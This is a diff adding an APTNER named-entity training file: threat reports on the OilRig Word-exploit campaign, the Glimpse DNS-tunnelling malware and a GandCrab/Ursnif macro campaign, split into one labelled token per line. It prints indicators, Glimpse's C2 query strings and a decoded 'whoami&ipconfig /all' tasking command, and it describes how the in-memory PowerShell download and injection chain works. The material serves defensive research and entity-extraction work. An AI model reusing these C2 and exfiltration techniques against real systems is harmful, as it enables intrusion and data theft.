diff --git "a/data/raw/APTNER/APTNERtrain.txt" "b/data/raw/APTNER/APTNERtrain.txt" new file mode 100644--- /dev/null +++ "b/data/raw/APTNER/APTNERtrain.txt" 
@@ -0,0 +1,189400 @@ +From O +April B-TIME +19-24 I-TIME +, I-TIME +2017 E-TIME +, O +a O +politically-motivated O +, O +targeted O +campaign O +was O +carried O +out O +against O +numerous O +Israeli S-LOC +organizations O +. O + +Morphisec B-SECTEAM +researchers E-SECTEAM +began O +investigating O +the O +attacks O +on O +April B-TIME +24 E-TIME +and O +continue O +to O +uncover O +more O +details O +. O + +Initial O +reports O +of O +the O +attacks O +, O +published O +April B-TIME +26 E-TIME +( O +in O +Hebrew S-LOC +) O +by O +the O +Israel B-SECTEAM +National I-SECTEAM +Cyber I-SECTEAM +Event I-SECTEAM +Readiness I-SECTEAM +Team E-SECTEAM +( O +CERT-IL S-SECTEAM +) O +and O +The O +Marker S-SECTEAM +, O +confirm O +that O +the O +attack O +was O +delivered O +through O +compromised O +email S-TOOL +accounts O +at O +Ben-Gurion B-IDTY +University E-IDTY +and O +sent O +to O +multiple O +targets O +across O +Israel S-LOC +. O + +Ironically O +, O +Ben-Gurion B-IDTY +University E-IDTY +is O +home O +to O +Israel B-SECTEAM +’s I-SECTEAM +Cyber I-SECTEAM +Security I-SECTEAM +Research I-SECTEAM +Center E-SECTEAM +. O + +Investigators O +put O +the O +origin O +of O +the O +attack O +as O +Iranian S-LOC +; O +Morphisec S-SECTEAM +’s O +research O +supports O +this O +conclusion O +and O +attributes O +the O +attacks O +to O +the O +same O +infamous O +hacker O +group O +responsible O +for O +the O +OilRig S-MAL +malware O +campaigns O +. O + +The O +fileless B-APT +attack E-APT +was O +delivered O +via O +Microsoft B-TOOL +Word E-TOOL +documents O +that O +exploited O +a O +former O +zero-day S-VULNAME +vulnerability O +in O +Word S-TOOL +, O +CVE-2017-0199 S-VULID +, O +to O +install O +a O +fileless O +attack O +variant O +of O +the O +Helminth S-MAL +Trojan S-MAL +agent O +. 
O + +Microsoft S-IDTY +released O +the O +patch O +for O +the O +vulnerability O +on O +April B-TIME +11 E-TIME +, O +but O +many O +organizations O +have O +not O +yet O +deployed O +the O +update O +. O + +The O +attackers O +actually O +based O +their O +attack O +on O +an O +existing O +Proof-of-Concept O +method O +that O +was O +published O +by O +researchers O +after O +the O +patch O +release O +. O + +By O +hunting O +through O +known O +malware O +repositories O +, O +Morphisec S-SECTEAM +identified O +matching O +samples O +uploaded O +by O +Israeli S-LOC +high-tech O +development O +companies O +, O +medical B-IDTY +organizations E-IDTY +and O +education B-IDTY +organizations E-IDTY +, O +indicating O +that O +they O +were O +victims O +of O +the O +attack O +. O + +For O +security O +purposes O +, O +Morphisec S-SECTEAM +is O +not O +revealing O +these O +names O +. O + +Upon O +deeper O +investigation O +into O +the O +installed O +Helminth S-MAL +fileless O +agent O +, O +we O +identified O +a O +near O +perfect O +match O +to O +the O +OilRig S-MAL +campaign O +executed O +by O +an O +Iranian S-LOC +hacker O +group O +against O +140 O +financial O +institutions O +in O +the O +Middle B-LOC +East E-LOC +last O +year O +, O +as O +analyzed O +by O +FireEye S-SECTEAM +, O +Palo B-SECTEAM +Alto I-SECTEAM +Networks E-SECTEAM +and O +Logrhythm S-SECTEAM +. O + +This O +group O +has O +become O +one O +of O +the O +most O +active O +threat O +actors O +, O +with O +noteworthy O +abilities O +, O +resources O +and O +infrastructure O +; O +speculations O +indicate O +the O +hacking O +organization O +to O +be O +sponsored O +by O +the O +Iranian B-IDTY +government E-IDTY +. 
O + +In O +other O +recent O +attacks O +( O +January B-TIME +2017 E-TIME +) O +, O +the O +group O +used O +a O +fake O +Juniper B-TOOL +Networks I-TOOL +VPN E-TOOL +portal O +and O +fake O +University B-IDTY +of I-IDTY +Oxford E-IDTY +websites O +to O +deliver O +malware O +as O +described O +by O +ClearSky S-SECTEAM +. O + +Name O +SHA256 S-ENCR +. O + +13.doc S-FILE +: O +a9bbbf5e4797d90d579b2cf6f9d61443dff82ead9d9ffd10f3c31b686ccf81ab S-SHA2 +. O + +558.doc S-FILE +, O +2.doc: O +2869664d456034a611b90500f0503d7d6a64abf62d9f9dd432a8659fa6659a84 S-SHA2 +. O + +1.doc S-FILE +: O +832cc791aad6462687e42e40fd9b261f3d2fbe91c5256241264309a5d437e4d8 S-SHA2 +. O + +3.doc S-FILE +: O +d4eb4035e11da04841087a181c48cd85f75c620a84832375925e6b03973d8e48 S-SHA2 +. O + +The O +most O +notable O +difference O +from O +last O +year O +’s O +OilRig S-MAL +campaign O +is O +the O +way O +the O +attack O +was O +delivered O +. O + +In O +the O +previous O +campaign O +, O +the O +Iranian S-LOC +group O +sent O +specially O +crafted O +Excel S-TOOL +and O +Word S-TOOL +files O +, O +which O +contained O +macros O +that O +targeted O +individuals O +were O +convinced O +to O +enable O +. O + +Name O +Delivery O +Server O +. O + +test4.hta S-FILE +http://comonscar.in S-URL +( O +82.145.40.46 S-IP +) O +. O + +test5.hta S-FILE +80.82.67.42 S-IP +. O + +test1.hta S-FILE +reserved O +. O + +SHA256: O +5ac61ea5142d53412a251eb77f2961e3334a00c83da9087d355a49618220ac43 S-SHA2 +. O + +Name O +SHA256 S-ENCR +. O + +0011.ps1 S-FILE +042F60714E9347DB422E1A3A471DC0301D205FFBD053A4015D2B509DB92029D1 S-SHA2 +. O + +1.vbs S-FILE +BE7F1D411CC4160BB221C7181DA4370972B6C867AF110C12850CAD77981976ED S-SHA2 +. 
O + +A O +Glimpse O +into O +Glimpse S-APT +For O +the O +second O +blog O +post O +in O +our O +series, O +the O +IronNet B-SECTEAM +Threat I-SECTEAM +Research I-SECTEAM +Team E-SECTEAM +examines O +the O +Glimpse S-MAL +malware O +that O +is O +written O +in O +PowerShell S-TOOL +and O +has O +been O +associated O +with O +OilRig S-APT/APT34 S-APT +. O + +Our O +first O +post O +about O +analyzing O +malware O +with O +DNS PROT +tunneling O +capabilities O +focuses O +on O +how O +the O +PoisonFrog S-MAL +malware O +uses O +DNS B-ACT +tunneling E-ACT +to O +send O +and O +receive O +victim O +information O +and O +commands O +. O + +Glimpse S-MAL +: O +6e86c57385d26a59c0df1580454b9967 S-MD5 +. O + +Glimpse S-MAL +is O +a O +PowerShell S-TOOL +script O +that O +is O +executed O +silently O +by O +Visual B-TOOL +Basic E-TOOL +script +. O + +Based O +on O +the O +code, O +it O +is O +unclear O +what O +initiates O +the O +Visual B-TOOL +Basic E-TOOL +script O +itself +. O + +However, O +a O +variety O +of O +typical O +persistence O +mechanisms, O +such O +as O +a O +scheduled O +task, O +could O +serve O +that O +purpose +. O + +After O +Glimpse S-MAL +starts, O +it O +checks O +for O +the O +existence O +of O +a O +directory O +and O +lock O +file +. O + +If O +no O +directory O +or O +lock O +file O +is O +found, O +Glimpse S-MAL +creates O +one +. O + +Alternatively, O +if O +these O +do O +exist O +and O +the O +lock O +file O +is O +older O +than O +10 O +minutes, O +the O +lock O +file O +is O +deleted O +and O +the O +previously O +running O +Glimpse S-MAL +script O +is O +killed +. O + +After O +the O +initial O +checks O +described O +above, O +Glimpse S-MAL +creates O +a O +hidden O +file O +that O +contains O +an O +agent O +ID, O +which O +is O +a O +simple O +concatenation O +of O +a O +random O +number O +10-99 O +and O +the O +first O +8 O +characters O +of O +a O +GUID S-TOOL +without O +dashes +. 
O + +The O +methods O +employed O +by O +Glimpse S-MAL +to O +perform O +DNS PROT +communications O +are O +determined O +by O +the O +mode O +in O +which O +it O +is O +operating O +(i.e., O +text O +mode O +or O +ping O +mode +) O +. O + +In O +text O +mode, O +Glimpse S-MAL +manually O +builds B-ACT +a I-ACT +DNS I-ACT +query E-ACT +to O +be O +transmitted O +over O +a O +UDP B-TOOL +socket E-TOOL +. O + +In O +ping O +mode, O +Glimpse S-MAL +uses O +a B-FILE +.NET E-FILE +method +. O + +The O +table O +below O +describes O +the O +operational O +mode, O +record O +types O +used, O +and O +the O +method O +used O +to O +send O +the O +query +. O + +The O +first O +DNS PROT +query O +by O +Glimpse S-MAL +requests O +the O +mode O +to O +be O +used O +in O +future O +communications O +with O +the O +controller O +(i.e., O +ping O +mode O +or O +text O +mode +) O +. O + +Prior O +to O +making O +any O +query, O +a O +function O +called O +AdrGen O +is O +used O +to O +build O +a O +query O +string +. O + +This O +function O +takes O +several O +parameters, O +most O +of O +which O +are O +represented O +in O +the O +subdomain O +label(s) O +of O +the O +query O +string +. O + +Below O +is O +a O +list O +of O +AdrGen O +parameters +. O + +As O +mentioned O +above, O +one O +of O +the O +parameters O +passed O +to O +the O +AdrGen O +function O +is O +the O +action O +parameter +. O + +Table O +5: O +Glimpse S-MAL +action O +parameters O +values O +for O +the O +AdrGen O +function O +below O +contains O +the O +possible O +parameters, O +a O +brief O +description, O +and O +return O +values O +applicable O +to O +the O +action O +parameter +. O + +The O +query O +to O +set O +the O +receive O +mode O +expects O +an O +A O +resource O +record O +response O +from O +the O +controller +. O + +The O +controller O +will O +respond O +with O +one O +of O +two O +responses: O +99.250.250.199 S-IP +will O +set O +the O +receive O +mode O +to O +text +. 
O + +Any O +other O +IP O +address O +will O +set O +the O +receive O +mode O +to O +ping, O +although O +the O +server-side O +software O +suggests O +199.250.250.99 S-IP +will O +be O +sent +. O + +When O +set O +in O +text O +receive O +mode, O +the O +malware O +uses O +the O +AdrGen O +function O +to O +create O +another O +query O +string O +with O +the O +r O +(receiver) O +flag O +and O +a O +W O +(wait) O +action O +parameter +. O + +The O +expected O +TXT O +record O +response O +has O +the O +following O +structure: O +command>data +. O + +In O +our O +sample O +traffic, O +the O +TXT O +resource O +record O +returned O +contained: O +S000s>10100 +. O + +This O +response O +tells O +the O +malware O +to O +set O +a O +variable O +for O +the O +file O +name O +to O +receivebox\rcvd10100 S-FILE +and O +set O +the O +next O +query O +action O +to O +D O +in O +order O +to O +request O +the O +next O +chunk O +of O +data +. O + +The O +malware O +sends O +another O +TXT O +query O +with O +the O +receiver O +structure +. O + +This O +query O +is O +depicted O +below: O +39e9D60005eca60000BCC64T.sample-domain.evil S-FILE +In O +the O +case O +of O +our O +sample O +traffic, O +the O +server O +responded O +with O +the O +following O +TXT O +resource O +record O +data: O +S0000>d2hvYW1pJmlwY29uZmlnIC9hbGw= +. O + +The O +controller O +provided O +the O +malware O +with O +base64-encoded S-ENCR +data O +to O +be O +decoded +. O + +The O +data O +will O +eventually O +be O +written O +to O +disk O +and O +the O +malware O +sets O +the O +next O +query O +action O +to O +D O +in O +order O +to O +request O +the O +next O +chunk O +of O +data +. O + +The O +decoded O +data O +shows O +a O +command O +to O +be O +executed B-ACT +whoami&ipconfig I-ACT +/all E-ACT +on O +the O +victim O +system +. O + +The O +malware O +sends O +another O +TXT O +query O +with O +the O +receiver O +structure, O +as O +depicted O +below +. 
O + +Note O +the O +request O +number O +parameter O +is O +now O +0001: O +39e965e000caD60001679C79T.sample-domain.evil S-FILE +. O + +The O +TXT O +record O +returned O +contained O +data: O +E0000>0 O +. O + +The O +controller O +issued O +the O +command O +to O +write O +the O +base64-decoded O +and O +modified O +data O +to O +the O +file O +name O +set O +earlier O +in O +the O +exchange O +. O + +After O +the O +file O +is O +written, O +the O +malware O +moves O +on O +to O +process O +operations O +. O + +Glimpse S-MAL +can O +be O +set O +to O +use O +ping O +mode O +in O +several O +ways O +while O +performing O +receive O +operations O +. O + +If O +a O +query O +with O +the O +M O +action O +returns O +an O +IP O +address O +that O +is O +not O +99.250.250.199 S-IP +, O +the O +malware O +will O +use O +ping O +mode O +. O + +It O +is O +worth O +noting O +that O +the O +IP O +response O +observed O +to O +set O +ping O +mode O +was O +the O +reverse O +of O +the O +IP O +used O +to O +set O +text O +mode O +(i.e., O +199.250.250.99 S-IP +) O +. O + +Ping O +mode O +will O +also O +be O +set O +if O +exceptions O +occur O +more O +than O +three O +times O +during O +text O +mode +. O + +In O +the O +latter O +case, O +the O +P O +action O +is O +passed O +as O +one O +of O +the O +parameters O +to O +AdrGen O +and O +the O +query O +is O +made O +for O +an O +A O +resource O +record O +using O +the O +[System.Net.Dns]::GetHostAddresses O +method +. O + +If O +performing O +receive O +operations O +in O +ping O +mode, O +Glimpse S-MAL +makes O +a O +query O +with O +the O +0 O +action O +to O +contact O +the O +controller O +for O +tasking +. O + +This O +query O +uses O +a O +receive O +structure O +similar O +to O +an O +M O +action; O +it O +is O +worth O +noting O +all O +of O +the O +receiver O +operation O +queries O +made O +in O +ping O +mode O +use O +the O +[System.Net.Dns]::GetHostAddresses O +method +. 
O + +In O +our O +sample, O +after O +the O +malware O +sent O +the O +0 O +action, O +the O +controller O +responded O +with O +an O +A O +record O +containing O +24.125.10.140 S-IP +. O + +This O +response O +tells O +the O +malware O +to: O +Set O +the O +file O +name O +for O +the O +data O +that O +will O +follow O +to O +10140, O +Set O +the O +part O +number O +to O +0, O +Parse O +response O +data, O +Set O +a O +1 O +action O +for O +the O +next O +query +. O + +Query: O +00039e9650eca66C06T.sample-domain.evil S-FILE +, O +Response: O +24.125.10.140 S-IP +, O +File O +name: O +10140, O +Query: O +139e965e000ca6D2C80T.sample-domain.evil S-FILE +, O +Response: O +110.101.116.0 S-IP +, O +Query: O +00339e965e1ca6EF4C07T.sample-domain.evil S-FILE +, O +Response: O +32.117.115.3 S-IP +, O +Query: O +30069e O +1965eca6FE8C13T.sample-domain.evil, O +Response: O +101.114.32.6 S-IP +, O +Query: O +391 B-FILE +e960095eca63570BC62T.sample-domain.evil E-FILE +, O +Response: O +1.2.3.0 S-IP +. O + +In O +this O +case, O +the O +content O +net O +user O +is O +written O +to O +rcvd10140 +. O + +After O +writing O +the O +data O +to O +disk, O +receiver O +operations O +are O +complete O +and O +processor O +operations O +begin +. O + +After O +writing O +the O +data O +received O +from O +the O +controller, O +a O +function O +is O +called O +to O +process O +the O +received O +file +. O + +The O +processor O +function O +builds O +a O +list O +of O +files O +from O +the O +files O +with O +content O +that O +match O +rcvd* O +in O +the O +receivebox O +directory +. O + +Similar O +to O +PoisonFrog S-MAL +, O +the O +last O +digit O +of O +the O +received O +file O +name O +determines O +how O +the O +content O +of O +the O +file O +is O +processed +. 
O + +In O +our O +sample O +traffic, O +after O +executing O +the O +commands O +sent O +via O +cmd.exe S-FILE +, O +Glimpse S-MAL +writes O +the O +output O +of O +the O +commands O +in O +the O +sendbox O +directory O +to O +the O +appropriate O +file O +names O +(e.g., O +10100 O +or O +10140) O +prepended O +with O +proc O +(e.g., O +proc10100 +) O +. O + +Once O +written, O +the O +send O +operations O +begin +. O + +Similar O +to O +text O +mode O +receiver, O +after O +AdrGen S-MAL +builds O +the O +string, O +a O +function O +to O +manually O +build O +and O +send O +the O +DNS PROT +query O +packet O +is O +called +. O + +The O +text O +mode O +sender O +uses O +the O +same O +hardcoded O +transaction O +ID O +0xa4a3; O +however, O +instead O +of O +sending O +queries O +for O +TXT O +resource O +records, O +the O +malware O +uses O +A O +resource O +records +. O + +As O +with O +the O +text O +mode O +receiver, O +the O +query O +is O +made O +with O +a O +direct O +connection O +to O +the O +controller O +IP O +address O +as O +opposed O +to O +allowing O +the O +query O +to O +propagate O +the O +native O +DNS PROT +architecture +. O + +If O +the O +send O +function O +is O +being O +invoked O +in O +ping O +mode, O +the O +process O +described O +above O +is O +followed; O +however, O +instead O +of O +manually O +building O +and O +transmitting O +the O +DNS PROT +query, O +the O +[System.Net.Dns]::GetHostAddresses O +method O +is O +used +. O + +With O +that O +method, O +the O +malware’s O +query O +will O +traverse O +the O +native O +DNS PROT +architecture O +as O +opposed O +to O +the O +victim O +making O +a O +direct O +connection O +to O +the O +controller +. O + +The O +send O +function O +uses O +several O +counters O +to O +maintain O +various O +pieces O +of O +information O +used O +to O +control O +the O +flow O +of O +execution +. 
O + +An O +exception O +counter O +is O +used O +to O +track O +the O +number O +of O +exceptions O +and O +will O +exit O +the O +send O +loop O +if O +a O +threshold O +is O +hit +. O + +The O +send O +counter O +is O +used O +to O +track O +the O +number O +of O +chunks O +sent O +to O +the O +controller +. O + +An O +additional O +counter O +exists O +to O +handle O +cases O +where O +the O +file O +being O +sent O +is O +larger O +than O +250 O +chunks +. O + +The O +send O +counter O +is O +initialized O +to O +0 O +and O +read O +from O +the O +fourth O +octet O +of O +the O +A O +record O +returned O +by O +the O +controller +. O + +The O +send O +counter O +is O +also O +passed O +to O +the O +AdrGen S-MAL +function O +as O +the O +part O +number O +parameter O +and O +is O +visible O +in O +the O +query O +string O +as O +depicted O +below: O +Query: O +239e965ec000a60000B6C90T.COCTab33333233332222222222222222210100A3280AAAAAAAAAAAAAAAAA.33333210100A.sample-domain.evil S-FILE +, O +Response: O +39.2.3.1 S-IP +, O +Query: O +230019e965eca60000A16DC20T.EBB466767667256666772556776662FBFD932F3F64079E4F730B65239FE0.33333210100A.sample-domain.evil S-FILE +, O +Response: O +39.2.3.2 S-IP +, O +Query: O +392e002965eca60000C6D18C42T.33232333332333500262233332466710E0E18362E239DDA839020190D932.33333210100A.sample-domain.evil S-FILE +. O + +When O +the O +send O +loop O +has O +fewer O +than O +60 O +bytes O +to O +send O +(e.g., O +a O +small O +file O +or O +the O +last O +part O +of O +a O +file), O +the O +send O +function O +transmits O +the O +remaining O +bytes O +with O +a O +shorter O +data O +section +. O + +When O +there O +are O +no O +more O +bytes O +to O +send, O +a O +hardcoded O +file O +end O +marker O +COCTabCOCT O +is O +sent O +in O +the O +data O +section O +and O +the O +send O +loop O +will O +be O +exited +. O + +The O +controller O +responds O +with O +the O +253.25.42.87 S-IP +A O +record O +response +. 
O + +Query: O +239055e965eca60000CC30T.66654667676673003300C93CC92212953EDACEDA.33333210100A.sample-domain.evil S-FILE +, O +Response: O +39.2.3.56 S-IP +, O +Query: O +05639e9652eca6000057C06T.COCTabCOCT33333210100A.sample-domain.evil S-FILE +, O +Response: O +253.25.42.87 S-IP +. O + +Once O +an O +A O +record O +response O +is O +received O +by O +the O +malware O +containing O +253.25.42.87 S-IP +, O +several O +variables O +are O +set O +in O +preparation O +to O +exit O +the O +send O +operation +. O + +After O +the O +send O +operation O +is O +complete, O +the O +lock O +file O +for O +the O +current O +run O +is O +deleted O +and O +the O +script O +exits +. O + +Many O +of O +the O +capabilities O +discovered O +in O +Glimpse S-MAL +were O +also O +present O +in O +the O +malware O +analyzed O +in O +part O +one O +of O +this O +series +. O + +Glimpse S-MAL +added O +the O +ability O +to O +use O +an O +alternate O +DNS PROT +resource O +record O +type O +(TXT) O +as O +opposed O +to O +solely O +relying O +on O +A O +resource O +records O +for O +DNS PROT +queries +. O + +Using O +TXT O +resource O +records O +enabled O +the O +actors O +to O +provide O +tasking O +in O +fewer O +transactions O +due O +to O +the O +amount O +of O +data O +that O +can O +be O +transmitted O +in O +a O +TXT O +response +. O + +To O +support O +this O +capability, O +the O +adversaries O +chose O +to O +manually O +craft O +the O +DNS PROT +queries O +and O +communicate O +directly O +with O +the O +controller O +as O +opposed O +to O +using O +existing O +.NET S-FILE +DNS PROT +libraries +. O + +The O +differences O +between O +PoisonFrog S-MAL +and O +Glimpse S-MAL +highlight O +the O +ease O +at O +which O +adversaries O +can O +modify O +their O +tools O +to O +meet O +their O +end O +objectives +. O + +With O +regard O +to O +detection, O +several O +methods O +can O +be O +used O +to O +identify O +this O +type O +of O +C2 S-TOOL +activity +. 
O + +Performing O +entropy O +calculations O +on O +subdomain O +labels O +can O +help O +highlight O +the O +amount O +of O +randomness O +in O +a O +label, O +but O +this O +is O +just O +one O +of O +many O +possible O +data O +analysis O +points, O +since O +a O +standalone O +feature O +may O +not O +be O +enough O +to O +determine O +whether O +traffic O +is O +malicious +. O + +The O +IronDefense O +Network O +Traffic O +Analysis O +platform O +combines O +several O +behavioral O +detection O +methods O +alongside O +historical O +network O +information O +to O +detect O +the O +C2 S-TOOL +techniques O +used O +by O +Glimpse S-MAL +and O +other O +malware +. O + + +Carbon B-SECTEAM +Black I-SECTEAM +TAU I-SECTEAM +ThreatSight E-SECTEAM +Analysis O +GandCrab S-MAL +and O +Ursnif S-MAL +Campaign +. O + +The O +Carbon B-SECTEAM +Black I-SECTEAM +ThreatSight E-SECTEAM +team O +observed O +an O +interesting O +campaign O +over O +the O +last O +month O +. O + +ThreatSight S-SECTEAM +worked O +with O +the O +Threat B-IDTY +Analysis I-IDTY +Unit E-IDTY +( O +TAU S-IDTY +) O +to O +research O +the O +campaign O +. O + +This O +report O +is O +being O +released O +to O +help O +researchers O +and O +security O +practitioners O +combat O +this O +campaign O +as O +new O +samples O +are O +being O +discovered O +in O +the O +wild O +daily O +. O + +This O +attack O +, O +if O +successful O +, O +can O +infect O +a O +compromised O +system O +with O +both O +Ursnif S-MAL +malware O +and O +GandCrab S-MAL +ransomware O +. O + +The O +overall O +attack O +leverages O +several O +different O +approaches O +, O +which O +are O +popular O +techniques O +amongst O +red O +teamers O +, O +espionage O +focused O +adversaries O +, O +and O +large O +scale O +criminal O +campaigns O +. 
O + +This O +campaign O +originally O +came O +in O +via O +phishing B-ACT +emails E-ACT +that O +contained O +an O +attached O +Word B-TOOL +document E-TOOL +with O +embedded O +macros O +, O +Carbon B-SECTEAM +Black E-SECTEAM +located O +roughly O +180 O +variants O +in O +the O +wild O +. O + +The O +macro O +would O +call O +an O +encoded O +PowerShell S-TOOL +script O +and O +then O +use O +a O +series O +of O +techniques O +to O +download O +and O +execute O +both O +a O +Ursnif S-MAL +and O +GandCrab S-MAL +variant O +. O + +This O +campaign O +has O +been O +discussed O +at O +a O +high O +level O +by O +other O +researchers O +publicly O +. O + +Carbon B-SECTEAM +Black E-SECTEAM +product O +specific O +content O +can O +be O +located O +in O +the O +User B-TOOL +Exchange E-TOOL +. O + +In O +this O +campaign O +the O +attackers O +used O +a O +MS B-TOOL +Word E-TOOL +document O +( O +.doc S-FILE +format O +) O +to O +deliver O +the O +initial O +stages O +. O + +It O +should O +be O +noted O +that O +out O +of O +the O +roughly O +180 O +Word S-TOOL +variants O +that O +were O +located O +by O +Carbon B-SECTEAM +Black E-SECTEAM +, O +the O +biggest O +difference O +in O +the O +documents O +was O +the O +metadata O +and O +junk O +data O +located O +in O +the O +malicious O +macros O +. O + +However O +the O +metadata O +clearly O +showed O +that O +the O +documents O +prepared O +for O +this O +campaign O +were O +initially O +saved O +on O +December B-TIME +17 I-TIME +, I-TIME +2018 E-TIME +and O +have O +continued O +to O +be O +updated O +through O +January B-TIME +21 I-TIME +, I-TIME +2019 E-TIME +. O + +Several O +metadata O +fields O +( O +specifically O +title O +, O +subject O +, O +author O +, O +comments O +, O +manager O +, O +and O +company O +) O +appear O +to O +have O +been O +populated O +with O +different O +data O +sets O +. 
O + +For O +example O +the O +subject O +in O +all O +the O +samples O +was O +a O +combination O +of O +a O +US S-LOC +state O +and O +a O +common O +first O +name O +( O +like O +Utah S-LOC +Erick O +or O +Tennessee S-LOC +Dayna O +) O +. O + +For O +this O +post O +the O +following O +sample O +was O +analyzed O +. O + +Richard_Johnson.doc S-FILE +: O +878e4e8677e68aba918d930f2cc67fbe S-MD5 +0a3f915dd071e862046949885043b3ba61100b946cbc0d84ef7c44d77a50f080 S-SHA2 +. O + +The O +document O +contained O +a O +VBS B-TOOL +macro E-TOOL +that O +once O +decompressed O +was O +approximately O +650 O +lines O +of O +code O +. O + +The O +vast O +majority O +of O +that O +was O +junk O +code O +. O + +Once O +the O +junk O +code O +was O +removed O +from O +the O +VBScript S-TOOL +, O +there O +are O +approximately O +18 O +lines O +of O +relevant O +code O +, O +which O +ultimately O +call O +a O +shape O +box O +in O +the O +current O +document O +. O + +The O +variable O +names O +themselves O +are O +not O +relevant O +, O +however O +the O +methods O +in O +bold O +below O +will O +retrieve O +the O +AlternativeText S-TOOL +field O +from O +the O +specified O +shape O +, O +which O +is O +then O +executed O +. O + +The O +alternate O +text O +can O +easily O +be O +observed O +in O +the O +body O +of O +the O +office O +document O +. O + +The O +area O +highlighted O +in O +blue O +is O +the O +shape O +name O +that O +is O +being O +located O +, O +while O +the O +text O +itself O +is O +highlighted O +in O +red O +. O + +It O +is O +clear O +that O +the O +text O +is O +a O +base64 S-ENCR +encoded O +command O +, O +that O +is O +then O +executed O +by O +the O +above O +VBScript S-TOOL +. 
O + +The O +PowerShell S-TOOL +script O +will O +first O +create O +an O +instance O +of O +the O +.Net S-FILE +Webclient O +class O +and O +then O +enumerate O +the O +available O +methods O +using O +the O +GetMethods() S-TOOL +call O +( O +highlighted O +in O +the O +image O +in O +red O +) O +. O + +The O +enumerated O +methods O +are O +stored O +, O +then O +a O +for O +loop O +looks O +first O +for O +the O +method O +named O +DownloadString S-TOOL +( O +highlighted O +in O +blue O +) O +. O + +If O +the O +DownloadString S-TOOL +method O +is O +located O +it O +will O +contact O +the O +hard O +coded O +C2 S-TOOL +requesting O +a O +file O +, O +which O +is O +downloaded O +and O +then O +invoked O +( O +highlighted O +in O +blue O +) O +. O + +It O +should O +be O +noted O +that O +because O +the O +requested O +resource O +is O +being O +stored O +as O +a O +string O +and O +executed O +, O +this O +all O +occurs O +in O +memory O +. O + +Additional O +Analysis O +of O +the O +downloaded O +string O +is O +provided O +in O +the O +Gandcrab S-MAL +cradle O +section O +below O +. O + +The O +loop O +then O +looks O +for O +the O +method O +name O +DownloadData S-TOOL +, O +and O +if O +located O +will O +download O +a O +resource O +from O +a O +second O +C2 S-TOOL +. O + +This O +request O +is O +then O +stored O +in O +the O +CommonApplicationData O +directory O +( O +C:\ProgramData O +in O +Vista O +and O +later O +) O +as O +the O +hard O +coded O +file O +name O +( O +highlighted O +in O +green O +) O +. O + +The O +script O +will O +utilize O +the O +hard O +coded O +DCOM S-TOOL +object O +C08AFD90-F2A1-11D1-8455-00A0C91F3880 O +, O +which O +is O +the O +ClassID O +for O +the O +ShellBrowserWindow S-TOOL +. 
O + +A O +previous O +blog O +post O +by O +enigma0x3 O +, O +detailed O +how O +this O +CLSID O +can O +be O +leveraged O +to O +instantiate O +the O +ShellBrowserWindow S-TOOL +object O +and O +call O +the O +ShellExecute S-TOOL +method O +, O +which O +is O +the O +same O +approach O +that O +was O +taken O +by O +the O +attackers O +. O + +This O +approach O +has O +also O +been O +used O +in O +different O +Empire S-TOOL +modules O +. O + +The O +payloads O +that O +are O +downloaded O +in O +the O +above O +steps O +are O +then O +executed O +on O +the O +system O +. O + +The O +first O +payload O +that O +is O +downloaded O +via O +the O +DownloadString S-TOOL +method O +highlighted O +above O +, O +is O +a O +PowerShell S-TOOL +one-liner O +that O +uses O +an O +IF O +statement O +to O +evaluate O +the O +architecture O +of O +the O +compromised O +system O +, O +and O +then O +downloads O +a O +additional O +payload O +from O +pastebin.com S-DOM +. O + +This O +additional O +payload O +is O +then O +executed O +in O +memory O +. O + +The O +image O +below O +depicts O +the O +contents O +of O +the O +o402ek2m.php S-FILE +file O +. O + +It O +should O +be O +noted O +that O +the O +contents O +of O +o402ek2m.php S-FILE +were O +updated O +by O +the O +attackers O +to O +reference O +different O +pastebin O +uploads O +throughout O +this O +campaign O +. O + +Also O +updated O +was O +the O +function O +name O +that O +is O +invoked O +, O +in O +the O +example O +below O +it O +was O +CJOJFNUWNQKRTLLTMCVDCKFGG O +, O +however O +this O +was O +dynamically O +changed O +to O +match O +the O +name O +of O +the O +function O +that O +would O +be O +present O +in O +pastebin O +file O +that O +was O +being O +downloaded O +. O + +Once O +the O +raw O +contents O +of O +the O +pastebin.com S-DOM +post O +were O +downloaded O +, O +that O +data O +would O +also O +be O +executed O +in O +memory O +. 
O + +In O +the O +variants O +that O +were O +obtained O +during O +this O +campaign O +the O +file O +contained O +a O +PowerShell S-TOOL +script O +that O +was O +approximately O +2800 O +lines O +. O + +This O +PowerShell S-TOOL +script O +is O +a O +version O +of O +the O +Empire B-TOOL +Invoke-PSInject E-TOOL +module O +, O +with O +very O +few O +modifications O +. O + +The O +majority O +if O +the O +modifications O +are O +of O +removing O +comments O +and O +renaming O +variables O +. O + +The O +script O +will O +take O +an O +embedded O +PE S-TOOL +file O +that O +has O +been O +base64 S-ENCR +encoded O +and O +inject O +that O +into O +the O +current O +PowerShell S-TOOL +process O +. O + +The O +image O +below O +is O +the O +main O +function O +that O +is O +being O +called O +which O +in O +turns O +calls O +the O +function O +responsible O +for O +injecting O +the O +embedded B-TOOL +PE I-TOOL +file E-TOOL +. O + +The O +base64 S-ENCR +encoded O +PE S-TOOL +file O +that O +can O +be O +seen O +in O +line O +2760 O +of O +the O +image O +above O +is O +a O +GandCrab S-MAL +Variant O +. O + +This O +variant O +( O +the O +metadata O +for O +which O +is O +listed O +below O +) O +is O +Gandcrab S-MAL +version O +5.0.4 +. O + +krab5.dll S-FILE +: O +0f270db9ab9361e20058b8c6129bf30e S-MD5 +d6c53d9341dda1252ada3861898840be4d669abae2b983ab9bf5259b84de7525 S-SHA2 +, O +Mon B-TIME +Oct I-TIME +29 I-TIME +17:39:23 I-TIME +2018 E-TIME +UTC O +. O +krab5.text S-FILE +: O +019bc7edf8c2896754fdbdbc2ddae4ec S-MD5 +. O +krab5.rdata S-FILE +: O +d6ed79624f7af19ba90f51379b7f31e4 S-MD5 +. O +krab5.data S-FILE +: O +1ec7b57b01d0c46b628a991555fc90f0 S-MD5 +. O +krab5.rsrc S-FILE +: O +89b7e19270b2a5563c301b84b28e423f S-MD5 +. O +krab5.reloc S-FILE +: O +685c3c775f65bffceccc1598ff7c2e59 S-MD5 +. O + +The O +second O +payload O +, O +downloaded O +via O +the O +DownloadData S-TOOL +method O +, O +is O +a O +Ursnif S-MAL +executable O +. 
